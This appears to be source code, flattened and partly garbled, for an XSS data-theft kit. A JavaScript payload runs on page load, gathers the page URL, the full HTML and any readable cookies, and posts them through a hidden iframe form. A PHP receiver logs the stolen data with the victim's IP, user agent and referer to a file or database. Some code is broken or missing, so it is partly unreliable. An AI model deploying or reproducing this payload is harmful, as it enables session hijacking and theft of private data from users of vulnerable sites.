// Send back function xssSendContent(content){ document.getElementById('info').value = content; window.onload = null; document.getElementById('form_xss').submit(); } function xssGatherInfo(){ var info = {}; // Current URL info.pageurl = document.location.href; // Contents of current page info.html = document.documentElement.outerHTML; // Any non HttpOnly cookies present info.cookies = document.cookies document.documentElement.innerHTML += 'A'; if( !document.getElementById('frame_xss') ){ frame = document.createElement('iframe'); frame.style='visibility: hidden;'; frame.name='frame_xss'; form = document.createElement('form'); form.action = '' form.target = 'frame_xss'; form.method='POST'; form.id = 'form_xss'; e = document.createElement('input'); e.type = 'hidden'; e.name = 'c'; e.id = 'info'; form.appendChild(e); body = document.getElementsByTagName('body') if( body.length = 0 ){ document.documentElement.appendChild(document.createElement('body')); body = document.getElementsByTagName('body') } body = body[0]; body.appendChild(frame); body.appendChild(form); } xssSendContent(btoa(JSON.stringify(info))); } window.onload = xssGatherInfo; scripturl = $url; // Referer $info->referer = $_SERVER['HTTP_REFERER']; // User's user agent $info->useragent = $_SERVER['HTTP_USER_AGENT']; // User's IP address $info->userip = $_SERVER['REMOTE_ADDR']; $info->method = $_SERVER['REQUEST_METHOD']; $info->logtime = date('Y-m-d H:i:s'); $aProperties = array( 'logtime', 'method', 'pageurl', 'scripturl', 'referer', 'cookies', 'useragent', 'userip', 'html' ); // Log this request if( $logging == 'file' ){ // File logging $str = ''; $str .= "\n\n===START XSS INFO===\n\n"; foreach( $aProperties as $prop ){ if( !property_exists( $info, $prop ) ) continue; $str .= $prop.": ".$info->{$prop}."\n"; } $str .= "\n\n===END XSS INFO===\n\n"; file_put_contents( $log_file, $str, FILE_APPEND ); }else{ // DB logging $db = new PDO("mysql:host={$db_host};dbname={$db_name};charset=utf8", $db_user, $db_pass); $present = ""; $markers = ""; $comma = ""; $data = array(); foreach( $aProperties as $prop ){ if( !property_exists( $info, $prop ) ) continue; $present .= $comma.' '.$prop; $markers .= $comma." ?"; $data[] = $info->{$prop}; $comma = ","; } $sql = "INSERT INTO log (".$present." ) VALUES (".$markers." )"; $stmt = $db->prepare($sql); $stmt->execute($data); } ?>